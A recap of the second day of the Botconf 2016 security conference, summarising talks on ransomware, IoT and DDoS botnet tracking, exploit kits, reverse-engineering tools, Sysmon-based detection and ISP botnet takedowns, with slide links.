DAY 2

Title: Ransomware & Beyond

Ransomware is now well-known, but its numbers continue to grow. In this talk, Christiaan Beek shares his research and experience. He begins by explaining why ransomware is so widespread and how, with limited computer skills, it's possible to use it.

He then details the various techniques he used to study and counter ransomware, such as:

• machine learning
• static/dynamic analyses
• memory analysis
• etc.

He then presents "Ransomware Interceptor", a project aimed at stopping ransomware infections by detecting file encryption, while concluding with their possible future developments.

 

Title: Attacking Linux/Moose 2.0 Unraveled an EGO MARKET

Linux/Moose is a worm targeting the IoT, particularly Linux systems with BusyBox. To track the activities of this worm, researchers at GoSecure, in partnership with ESET, set up several honeypots which were used to study the connections opened by the botnet.

Masarah Paquet-Clouston and Olivier Bilodeau from GoSecure demonstrate how the bot launches a Man-in-the-Middle (MITM) attack on HTTPS connections by mimicking a TLS inspection to target social media. They explain that the bot's goal is to remain as discreet as possible, avoiding direct victims to prevent attracting attention. The ultimate aim is to generate likes or followers on social media.

In conclusion, the speakers explain how they traced the botnet back to the site they believe to be the source of the social media stock purchases, but also that, despite their efforts, the authorities and hosting providers are not interested in this botnet due to a lack of 'direct victims'.

Slides: https://www.botconf.eu/wp-content/uploads/2016/11/PR08-MOOSE-BILODEAU-PAQUET-CLOUSTON.pdf

 

Title: Tracking Exploit Kits

John Bambenek from Fidelis Cybersecurity presents his method for tracking exploit kits. Indeed, exploit kits are one of the most widespread methods for distributing viruses, so monitoring them can greatly reduce infections.

John Bambenek's priorities are to ensure the detection of Exploit kits to protect users, but also to develop intelligence for monitoring Exploit Kits.

Therefore, Fidelis Cybersecurity has deployed virtual machines vulnerable to specific exploit kits in order to track these kits based on the vulnerabilities they exploit. Combined with a web crawler (such as Bing's bot), this allows for the detection of malicious URLs.

In conclusion, John Bambenek's method makes it possible to monitor a large number of Exploit Kits, which he then links to malware families or hacker groups.

Sildes: https://www.botconf.eu/wp-content/uploads/2016/11/PR09-Tracking-exploit-kits-Bambenek.pdf

 

Title: Improve DDoS Botnet Tracking With Honeypots

This talk by Ya Liu, a researcher at Qihoo 360, shows us how to track DDoS attacks originating from botnets in order to find out:

• Who is being attacked?
• Which botnet family attacks
• Which Command & Control handles the attack?
• What are the parameters of the attack?

The Qihoo 360 team began monitoring over 30 botnet families in 2014. They expose their strategies using more than a dozen honeypots. To categorize these families, Ya Liu and his colleagues rely on the Packet Generation Algorithm (PGA) signature. Three types of attacks are supported: TCP SYN-ACK, DNS response attacks, and ICMP unreachable messages.

Qihoo 360 thus detected 2,333 SYN-ACKs and 1,835 DNSs from August 2015 to October 2016.

Slides: https://www.botconf.eu/wp-content/uploads/2016/11/PR10-Improve-DDoS-Botnet-Tracking-With-Honeypots-LIU.pdf

 

Title: Function Identification and Recovery Signature Tool (FIRST)

At 12:30 Angel Villegas (Talos) presented "Function Identification and Recovery Signature Tool (FIRST)", an IDA plugin that facilitates the reverse engineering of unknown binaries.

The plugin's purpose is to store and centralize various information for a given set of opcodes (function name, comments, source, etc.) on a shared server. This allows users to retrieve metadata associated with all of the program's functions when analyzing a new program, provided they are present on the FIRST server. Talos has set up a public FIRST server, which they have populated by compiling numerous open-source projects. It is also possible to set up a private ("on-premise") FIRST server, as described in the documentation available here: http://first-plugin-ida.readthedocs.io/en/latest/.

The project's source code is available on Github:  https://github.com/vrtadmin/FIRST-plugin-ida

Slides: https://www.botconf.eu/wp-content/uploads/2016/11/PR11-Function-Identification-and-Recovery-Signature-Tool-Villegas.pdf

 

Title: Advanced Incident Detection and Threat Hunting using Sysmon (and Splunk)

After a quick introduction of "sysmon", a tool from the sysinternals suite, Tom Ueltschi presents his approach to improving detection on workstations.

The goal is to propose a method based on "sysmon" and Splunk to generate automated and customizable alerts in the event of workstation compromise. To generate these alerts, Tom Ueltschi created rules based on suspicious and unusual behavior.

Thus, it presents us with rules for detecting the execution of PowerShell commands, such as downloading a file or using arguments that are not typical during program execution. Some detection rules are based on the actions of classic penetration testing tools in order to detect the same behaviors produced during this type of intervention.

 

Title: How Does Dridex Hide Friends?

From 2:40 PM to 3:00 PM, Alexandra Toussaint (OpenMinded) and Sébastien Larinier (Sekoia) presented an investigation that took place following a fraudulent bank transfer of €800,000 from an account with multi-factor authentication. The investigation was conducted using a disk image of the infected machine. The identified files (VBS) allowed investigators to deduce that the malware was Dridex. However, other files unrelated to Dridex (notably a file named "j.bat" containing obfuscated PowerShell code) were also identified on the disk.

The presence of these files rules out the possibility of Dridex bots being resold to other actors who would have carried out the bank transfer via the RemoteUtilities remote administration tool.

 

Title: A Tete-a-Tete with RSA Bots

At 3 PM, Jens Frieß presented "A Tete-A-Tete with RSA Bots," a presentation focused on reverse engineering bots using asymmetric cryptography when communicating with the C&C server. His approach involves setting up a client-server architecture similar to that used by the botnet, but replacing the key pairs. The bot's public key is replaced by injecting a DLL that hooks the Windows APIs related to key and certificate management. Communication with the fake C&C server is made possible via DNS spoofing. His method has proven effective against Panda Banker (a Zeus clone) and URLZone. However, it does have some limitations:

• Applies only in the case of dynamic analysis
• This only works if the bot uses standard libraries and if no mechanism against DLL injection is present.
• Requires knowledge of the structure of messages transmitted between clients and the server.

 

Title: Takedown client-server botnets the ISP-way

After a short coffee break, Quảng Trần Minh from the Viettel Group presented "Takedown client-server botnets the ISP way," beginning by listing the strengths and capabilities available to an ISP to combat botnets (DNS, traffic control, DPI, etc.). The Viettel Group set up a dummy C&C server to which it redirects its users' traffic in the event of an infection. Several redirection methods were implemented:

• Change the DNS entry on the ISP's DNS server to point to the analysis server
• Modifying DNS responses/queries in cases where users do not use the ISP's DNS server
• Direct redirection of IP traffic, if the connection is made directly via an IP address.

Quảng Trần Minh explained the technical specifications of the server they implemented. It is based on a system of dispatchers and modules, which allow for the simulation of several different C&C servers on a single server, depending on the protocols used, message structure, etc.

The methods presented have proven effective against the Ramnit and Andromeda botnets, but can hardly be applied to bots that verify the identity of the C&C or that use an asymmetric encryption layer.

Slides: https://www.botconf.eu/wp-content/uploads/2016/11/PR15-Takedown-ISP-QUANG-TRAN-MINH.pdf

Title: Detecting the Behavioral Relationships of Malware Connections

Sebastian Garcia presents a method for detecting compromises that no longer relies on Indicators of Compromise (IOCs) but on virus behavior. He explains that IOCs are the best current detection method, but they are not sufficient.

Stratosphere IPS is open-source software based on virus 'intentions' coupled with machine learning. This IPS models virus behavior based on connections established with a set of destination IP addresses and ports, and the protocol used, in order to determine the behavior of each virus.

Although this IPS is still under development and generates false positives, Sebastian Garcia explains how to improve malware detection by using abnormal behaviors.

Slides: https://www.botconf.eu/wp-content/uploads/2016/11/PR16-Detecting-the-Behavioral-Relationships-of-Malware-Connections-GARCIA.pdf

 

Title: Analysis of free movies and series websites guided by user terms search

At 5:15 PM, Luis Alberto Benthin Sanguino presented a study demonstrating that websites offering free movies and series are among those that distribute the most malicious content. Indeed, free entertainment attracts numerous users worldwide and is therefore a prime attack vector for botnet operators. Luis Alberto's approach involved examining the top 20 results returned by the Google search engine for queries such as "free online movies" in various languages.

The automated queries are performed using Selenium scripts to simulate the behavior of a legitimate user. The various domain names and URLs scanned are sent to VirusTotal to assess the malicious nature of the content.

The results of his study show that searches conducted in German include the fewest malicious results, while searches conducted in Spanish include more.

Slides: https://www.botconf.eu/wp-content/uploads/2016/11/PR17-Analysis-of-Free-Movies-and-Series-Websites-Guided-by-Users-Search-Terms-BENTHIN.pdf

Lightning talks

The final slot of this second day was dedicated to lightning talks, with 11 presentations of 3 minutes each:

•  «"Unprotect", an open source project that consists of installing virtual machine artifacts (DLLs, registry keys, etc.) on classic workstations in order to deceive malware using anti-virtualization mechanisms and prevent infections. http://unprotect.tdgt.org/index.php/Unprotect_Project
• Osiris, a Windows executable emulator/debugger that facilitates analysis by applying hooks via DLL injection. http://os-iris.sourceforge.net/
• Feedback from Deutsh telekom regarding attacks on the TR-069 protocol of certain routers.
• The Botleg project, which concerns the legitimacy, legality, and regulation of attacks against botnets.
• A thesis presentation concerning Android botnets.
• sisyphe.io, a project similar to Shodan using massscan, allows you to obtain various information about an IP address.
• «A little rent about the use of Virustotal»
• Analysis and evolution of the TrickBot botnet
• Malboxes, an automation tool that allows the creation of virtual machines to facilitate malware analysis.
• .NET malware analysis
• Dridex tracking

Finally, the day ended with the social event which took place at the Trinity Chapel.

 

(Links to reports from other days:) Day 1 & day 3)